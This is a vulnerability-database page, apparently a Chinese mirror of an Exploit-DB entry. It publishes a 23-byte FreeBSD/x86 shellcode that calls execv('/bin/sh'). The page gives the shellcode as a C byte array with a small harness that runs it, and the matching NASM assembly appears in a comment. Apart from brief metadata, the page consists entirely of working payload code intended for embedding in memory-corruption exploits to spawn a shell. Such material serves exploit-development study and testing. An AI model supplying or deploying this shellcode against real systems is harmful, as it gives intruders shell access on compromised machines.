FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057194 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 FreeBSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43504
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
 -------------- FreeBSD/x86 - execv("/bin/sh") 23 bytes -------------------------
 *  AUTHOR : Tosh
 *   OS    : BSDx86 (Tested on FreeBSD 8.1)
 *   EMAIL : tosh@tuxfamily.org
 */

#include <string.h>
#include <stdio.h>



char shellcode[] = "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
                   "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
                   "\x54\x53\xb0\x3b\x50\xcd\x80";

int main(void)
{
   void(*f)() = (void*)shellcode;

   printf("Len = %d\n", sizeof(shellcode)-1);
   f();
}

/*!
 %define SYS_EXECV 59


section .text

global _start

_start:
   xor eax, eax

   push eax

   push '//sh'
   push '/bin'

   mov ebx, esp

   push eax
   push esp
   push ebx
   mov al, SYS_EXECV
   push eax
   int 0x80
*/